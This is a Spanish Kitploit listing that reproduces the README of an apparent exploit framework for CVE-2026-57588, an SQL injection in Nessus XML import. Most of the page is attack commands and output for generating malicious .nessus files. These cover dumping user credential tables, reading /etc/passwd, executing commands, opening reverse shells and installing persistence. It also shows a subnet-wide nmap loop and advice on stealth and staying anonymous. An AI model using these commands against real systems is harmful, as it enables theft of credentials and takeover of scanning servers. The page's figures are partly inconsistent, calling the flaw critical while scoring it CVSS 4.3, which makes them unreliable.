Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC — PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosPost-ExplotaciónPruebas de PenetraciónComando y ControlRed Teaming

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Seguridad de Bases de Datos
GitHubcerberusmrxi/cve-2026-57588-nessus-xml-import-sql-injection-poc

CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

Ver Repositorio
1hace 1 mesAún no revisado

Acerca de

PoC para CVE-2026-57588 - Inyección SQL en la importación XML de Nessus 10.12.0. Genera archivos .nessus maliciosos para enumerar bases de datos, exfiltrar credenciales y probar inyección ciega basada en tiempo. Para investigación de seguridad autorizada. Autor: Sudeepa Wanigarathna. Parcheado en 10.12.1.

Compartir

🛡️ CVE-2026-57588 - Framework de Explotación de Inyección SQL en Nessus

Security Research CVE Version Python License


📋 Tabla de Contenidos

  • Descripción General
  • Detalles de la Vulnerabilidad
  • Características
  • Instalación
  • Inicio Rápido
  • Ejemplos de Uso
  • Tipos de Payload
  • Escenarios Avanzados
  • Informes
  • Solución de Problemas
  • Consideraciones de Seguridad
  • Licencia

🔍 Descripción General

CVE-2026-57588 es una vulnerabilidad crítica de inyección SQL descubierta en Tenable Nessus versiones 10.12.0 y anteriores. La vulnerabilidad reside en el mecanismo de análisis XML al importar archivos de resultados de escaneo .nessus, lo que permite a usuarios autenticados con privilegios de importación ejecutar consultas SQL arbitrarias contra la base de datos PostgreSQL del backend.


⚠️ Detalles de la Vulnerabilidad

🔬 Detalles Técnicos

La vulnerabilidad existe debido a una sanitización insuficiente de los valores de las etiquetas XML antes de que se incorporen a las consultas SQL durante el proceso de importación. Un actor malicioso puede crear un archivo .nessus que contenga payloads de inyección SQL especialmente diseñados en etiquetas XML como:

  • hostname
  • fqdn
  • os
  • system-type
  • mac-address
  • netbios-name

Cuando un usuario privilegiado importa el archivo malicioso, los valores no sanitizados se ejecutan contra el backend de PostgreSQL, lo que permite:

  • Enumeración de la base de datos
  • Exfiltración de datos
  • Ejecución de comandos
  • Acceso al sistema de archivos
  • Instalación de persistencia

✨ Características

Haz clic para expandir la lista de características

🎯 Gestión de Payloads

  • Más de 13 tipos de payload categorizados por propósito
  • Generación de payloads basada en plantillas
  • Creación y validación de payloads personalizados
  • Validación de parámetros y comprobación de sintaxis
  • Verificación de sintaxis SQL

🚀 Capacidades de Explotación

  • Explotación multi-etapa con ejecución en paralelo
  • Fingerprinting y enumeración de bases de datos
  • Exfiltración de datos con selección personalizada de tablas/columnas
  • Ejecución de comandos en el sistema objetivo
  • Acceso y lectura del sistema de archivos
  • Reverse shell con sesión interactiva
  • Mecanismos de instalación de persistencia
  • Inyección SQL ciega basada en tiempo
  • Inyección SQL ciega basada en booleanos
  • Inyección SQL basada en errores
  • Consultas apiladas (stacked queries) para explotación avanzada
  • Exfiltración DNS fuera de banda (out-of-band)

📊 Informes y Registros

  • Informes HTML con estilo profesional
  • Informes Markdown para documentación
  • Informes JSON para automatización
  • Informes de texto para revisión rápida
  • Rotación de logs con múltiples niveles
  • Estadísticas detalladas de ejecución
  • Hash de archivos para verificación de integridad

📦 Instalación

🐍 Requisitos Previos

  • Python 3.7 o superior
  • pip (gestor de paquetes de Python)
  • Git (opcional, para clonar)

🔧 Instalación Rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Create and activate virtual environment
python3 -m venv venv
source venv/bin/activate  # On Windows: venv\Scripts\activate

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

🐳 Instalación con Docker

root@kitploit:~
# Build the Docker image
docker build -t nessus-exploit .

# Run the tool
docker run -it --rm nessus-exploit generate -u https://test.com -p enum

📦 Instalación como Paquete

root@kitploit:~
# Install as a package
pip install -e .

# Now you can run from anywhere
nessus-exploit generate -u https://test.com -p enum

🚀 Inicio Rápido

Uso Básico

root@kitploit:~
# Generate a basic enumeration exploit
python3 exploit.py generate -u https://test.com -p enum

# Generate advanced multi-stage exploit
python3 exploit.py generate -u https://test.com -p advanced -o exploit.nessus

# Extract data from database
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

Ayuda de Comandos

root@kitploit:~
# Show general help
python3 exploit.py --help

# Show generate command help
python3 exploit.py generate --help

# List all available payloads
python3 exploit.py list

💡 Ejemplos de Uso

1. Enumeración Básica

root@kitploit:~
python3 exploit.py generate -u https://test.com -p enum
Salida Esperada
root@kitploit:~
[2026-07-22 10:15:23] [INFO] [*] Starting exploitation against https://test.com
[2026-07-22 10:15:23] [INFO] [*] Session: xK9mN2pQ5wR8yV7tJ4sL3fG6hD1
[2026-07-22 10:15:23] [INFO] [*] Payload: enum
[2026-07-22 10:15:23] [INFO] [*] Executing stage: fingerprint
[2026-07-22 10:15:24] [INFO] [+] Generated XML: exploit_20260722_fingerprint_101523.nessus (3847 bytes)
[2026-07-22 10:15:24] [INFO] [*] Executing stage: schema_dump
[2026-07-22 10:15:25] [INFO] [+] Generated XML: exploit_20260722_schema_dump_101524.nessus (4213 bytes)
[2026-07-22 10:15:25] [INFO] [+] Exploitation complete! Duration: 2.15s

============================================================
EXPLOITATION SUMMARY
============================================================
Target: https://test.com
Status: SUCCESS
Duration: 2.15s
Files Generated: 3
Reports Generated: 3
============================================================

2. Explotación Avanzada Multi-Etapa

root@kitploit:~
python3 exploit.py generate -u https://test.com -p advanced -o custom.nessus -v

3. Exfiltración de Datos

root@kitploit:~
# Extract user credentials
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Extract with custom columns
python3 exploit.py generate -u https://test.com -p dump --table scan_results --columns scan_name,start_time,status

4. Reverse Shell

root@kitploit:~
# Start listener and generate exploit
python3 exploit.py generate -u https://test.com -p shell -lp 4444 -o shell.nessus

5. Ejecución de Comandos

root@kitploit:~
# Execute basic commands
python3 exploit.py generate -u https://test.com -p exec --command "whoami && id && uname -a"

# Execute complex commands
python3 exploit.py generate -u https://test.com -p exec --command "ps aux | grep nessus"

6. Lectura de Archivos

root@kitploit:~
# Read system files
python3 exploit.py generate -u https://test.com -p file -f /etc/passwd

# Read application logs
python3 exploit.py generate -u https://test.com -p file -f /var/log/nessus/nessusd.log

7. Inyección Ciega Basada en Tiempo

root@kitploit:~
# 5-second delay
python3 exploit.py generate -u https://test.com -p sleep -s 5

# 30-second delay for heavy tests
python3 exploit.py generate -u https://test.com -p sleep -s 30

8. Con Soporte de Proxy

root@kitploit:~
# HTTP proxy
python3 exploit.py generate -u https://test.com -p advanced --proxy http://127.0.0.1:8080

# HTTPS proxy with authentication
python3 exploit.py generate -u https://test.com -p advanced --proxy https://user:[email protected]:8080

9. Ejecución en Paralelo

root@kitploit:~
# Run with 8 parallel jobs
python3 exploit.py generate -u https://test.com -p advanced --jobs 8

# With custom timeout and retries
python3 exploit.py generate -u https://test.com -p advanced --jobs 4 --timeout 60 --retries 5

10. Modos Verboso y Silencioso

root@kitploit:~
# Verbose mode (detailed output)
python3 exploit.py generate -u https://test.com -p advanced -v --log-file debug.log

# Quiet mode (minimal output)
python3 exploit.py generate -u https://test.com -p advanced -q

📚 Tipos de Payload

Categoría: FINGERPRINTING

PayloadDescripciónParámetros
fingerprintFingerprinting de la base de datosNinguno

Categoría: UNION

PayloadDescripciónParámetros
schema_dumpVolcar el esquema de la base de datosNinguno
data_exfilExtraer datos de tablastable, columns

Categoría: TIMING

PayloadDescripciónParámetros
time_basedInyección ciega basada en tiempodelay
boolean_blindCiega basada en booleanoscondition,

Categoría: FILE_ACCESS

PayloadDescripciónParámetros
file_readLeer archivos del sistemapath, offset, length

Categoría: COMMAND_EXEC

PayloadDescripciónParámetros
command_execEjecutar comandos del sistemacommand

Categoría: REVERSE_SHELL

PayloadDescripciónParámetros
reverse_shellEstablecer reverse shellhost, port

Categoría: PERSISTENCE

PayloadDescripciónParámetros
persistenceInstalar persistenciaNinguno

Categoría: ERROR_BASED

PayloadDescripciónParámetros
error_basedInyección basada en erroresquery

Categoría: STACKED

PayloadDescripciónParámetros
stacked_queriesConsultas apiladasquery

Categoría: OUT_OF_BAND

PayloadDescripciónParámetros
oob_dnsExfiltración DNShost, data

🎯 Escenarios Avanzados

Escenario 1: Flujo de Trabajo de Compromiso Completo

root@kitploit:~
# Step 1: Enumerate the database
python3 exploit.py generate -u https://test.com -p enum -v

# Step 2: Extract sensitive data
python3 exploit.py generate -u https://test.com -p dump --table nessus_users --columns username,password_hash,email

# Step 3: Establish persistence
python3 exploit.py generate -u https://test.com -p persist

# Step 4: Set up reverse shell
python3 exploit.py generate -u https://test.com -p shell -lp 4444

Escenario 2: Operaciones Sigilosas

root@kitploit:~
# Using proxy and quiet mode
python3 exploit.py generate -u https://test.com -p advanced \
    --proxy http://127.0.0.1:8080 \
    --no-ssl-verify \
    -q \
    -o stealth_scan.nessus

Escenario 3: Pipeline de Pruebas Automatizadas

root@kitploit:~
#!/bin/bash
# auto_exploit.sh - Automated exploitation script

TARGET="https://test.com"
OUTPUT_DIR="./results_$(date +%Y%m%d_%H%M%S)"
mkdir -p $OUTPUT_DIR

# Run all payloads
for payload in enum dump shell persist; do
    echo "[*] Running payload: $payload"
    python3 exploit.py generate -u $TARGET -p $payload -o "$OUTPUT_DIR/${payload}_scan.nessus" -q
done

# Generate comprehensive report
python3 exploit.py report -i "$OUTPUT_DIR" -o "$OUTPUT_DIR/final_report"

Escenario 4: Evaluación de Seguridad Empresarial

root@kitploit:~
# Network-wide assessment
for target in $(nmap -p 8834 --open 192.168.1.0/24 | grep "Nessus" | awk '{print $5}'); do
    echo "[*] Testing: $target"
    python3 exploit.py generate -u "https://$target" -p advanced -o "scan_${target}.nessus" -q
done

Escenario 5: Recopilación de Evidencias

root@kitploit:~
# Collect comprehensive evidence
python3 exploit.py generate -u https://test.com -p advanced \
    --file /etc/hosts \
    --command "systemctl status nessusd" \
    --table nessus_users \
    --columns username,password_hash,email,last_login \
    -v \
    --log-file evidence.log

📊 Informes

Formatos de Informe Disponibles

Generar Informes

root@kitploit:~
# Generate all report formats
python3 exploit.py report -i results.json -o report

# Generate HTML report only
python3 exploit.py report -i results.json -o report.html --format html

# Generate Markdown report
python3 exploit.py report -i results.json -o report.md --format markdown

Contenido del Informe

  • Información del objetivo
  • ID de sesión y tipo de payload
  • Estadísticas de ejecución
  • Lista de archivos generados
  • Hashes de archivos para integridad
  • Registros de errores (si los hay)
  • Avisos legales y advertencias

🔧 Solución de Problemas

Problemas Comunes y Soluciones

Problema 1: Errores de Conexión
root@kitploit:~
# Error: Connection refused
# Solution: Check if Nessus is running and port is accessible
python3 exploit.py generate -u https://test.com:8834 -p enum

# Error: SSL certificate verification failed
# Solution: Disable SSL verification
python3 exploit.py generate -u https://test.com -p enum --no-ssl-verify
Problema 2: Errores de Validación XML
root@kitploit:~
# Error: Invalid XML structure
# Solution: Disable XML validation
python3 exploit.py generate -u https://test.com -p enum --no-validate
Problema 3: Errores de Payload
root@kitploit:~
# Error: Missing required parameter
# Solution: Check payload requirements
python3 exploit.py validate -p command_exec

# Then provide required parameters
python3 exploit.py generate -u https://test.com -p exec --command "whoami"
Problema 4: Permiso Denegado
root@kitploit:~
# Error: Cannot write files
# Solution: Check directory permissions
chmod 755 ./outputs/
python3 exploit.py generate -u https://test.com -p enum -o ./outputs/scan.nessus
Problema 5: Problemas de Timeout
root@kitploit:~
# Error: Operation timed out
# Solution: Increase timeout
python3 exploit.py generate -u https://test.com -p advanced --timeout 120

# Or use retries
python3 exploit.py generate -u https://test.com -p advanced --retries 5

🔐 Consideraciones de Seguridad

⚠️ Advertencias Importantes

  1. Cumplimiento Legal: Utilice únicamente en sistemas que le pertenezcan o para los que tenga permiso explícito por escrito para realizar pruebas
  2. Protección de Datos: Maneje las credenciales y los datos extraídos con extremo cuidado
  3. Entorno Aislado: Pruebe siempre en entornos de laboratorio aislados
  4. Copias de Seguridad: Realice siempre copias de seguridad de las bases de datos antes de probar
  5. Restauración: Restaure los sistemas a su estado original después de las pruebas
  6. Documentación: Documente todas las actividades de prueba para el cumplimiento normativo

✅ Buenas Prácticas

  1. Utilice cuentas de prueba dedicadas
  2. Mantenga registros detallados de todas las acciones
  3. Utilice VPN/proxy para mantener el anonimato al probar sistemas de terceros
  4. Siga las pautas de divulgación responsable
  5. Eduque a su equipo sobre la vulnerabilidad

📝 Licencia

Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE para obtener más detalles.


🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dude en enviar un Pull Request.

Configuración de Desarrollo

root@kitploit:~
# Clone repository
git clone https://github.com/CerberusMrXi/CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC
cd CVE-2026-57588-Nessus-XML-Import-SQL-Injection-PoC

# Install development dependencies
pip install -r requirements-dev.txt

# Run tests
pytest

# Format code
black exploit.py

# Check linting
flake8 exploit.py

📞 Soporte

Documentación

  • Aviso de Seguridad Oficial de Tenable
  • Entrada en la Base de Datos de CVE
  • Documentación de Nessus

Contacto

  • Autor: Sudeepa Wanigarathna
  • Email: [email protected]
  • GitHub: CerberusMrXi

📄 Registro de Cambios

Versión 1.0.0 (2026-07-22)

Versión Inicial

  • ✅ Framework de explotación integral
  • ✅ 13 tipos de payload categorizados por propósito
  • ✅ Explotación multi-etapa con ejecución en paralelo
  • ✅ Validación XML y comprobación de esquemas
  • ✅ Múltiples formatos de informe (HTML, Markdown, JSON, Texto)
  • ✅ Hash automático de archivos y verificación de integridad
  • ✅ Registro profesional con rotación
  • ✅ Soporte de proxy para operaciones sigilosas
  • ✅ Reverse shell con sesión interactiva
  • ✅ Mecanismos de persistencia
  • ✅ Ejecución de comandos y lectura de archivos
  • ✅ Inyección ciega basada en tiempo y en booleanos
  • ✅ Inyección basada en errores y consultas apiladas
  • ✅ Exfiltración DNS fuera de banda (out-of-band)
  • ✅ Soporte de Docker
  • ✅ Compatibilidad multiplataforma

⬆ Volver Arriba


⚠️ AVISO LEGAL: Esta herramienta es SOLO para pruebas de seguridad EDUCATIVAS y AUTORIZADAS. El uso no autorizado es ILEGAL. El autor no asume NINGUNA RESPONSABILIDAD por el mal uso.

Descargar herramienta
PropiedadValor
ID de CVECVE-2026-57588
Tipo de VulnerabilidadInyección SQL
Productos AfectadosTenable Nessus 10.12.0 y anteriores
Versión CorregidaNessus 10.12.1 y posteriores
Puntuación CVSS4.3 (Media)
Vector de AtaqueRed
Complejidad de AtaqueBaja
Privilegios RequeridosAutenticado (Permisos de importación)
Interacción del UsuarioRequerida (Ingeniería social)
ImpactoExfiltración de datos, RCE

🛠️ Funciones Avanzadas

  • Ejecución en paralelo con trabajos configurables
  • Soporte de proxy para operaciones sigilosas
  • Gestión de certificados SSL/TLS
  • Validación XML y comprobación de esquemas
  • Modo interactivo para explotación en vivo
  • Mecanismo de reintentos para mayor fiabilidad
  • Configuración de timeout para conexiones lentas

📦 Herramientas Profesionales

  • Estructura CLI basada en subcomandos
  • Modos verboso y silencioso
  • Salida de terminal en color
  • Indicadores de progreso para tareas largas
  • Soporte de Docker para pruebas contenerizadas
  • Compatibilidad multiplataforma (Linux, Windows, macOS)
delay
FormatoDescripciónUso
HTMLInforme HTML profesional con estilos--format html
MarkdownFormato Markdown para documentación--format markdown
JSONJSON para automatización--format json
TextoTexto plano para revisión rápida--format text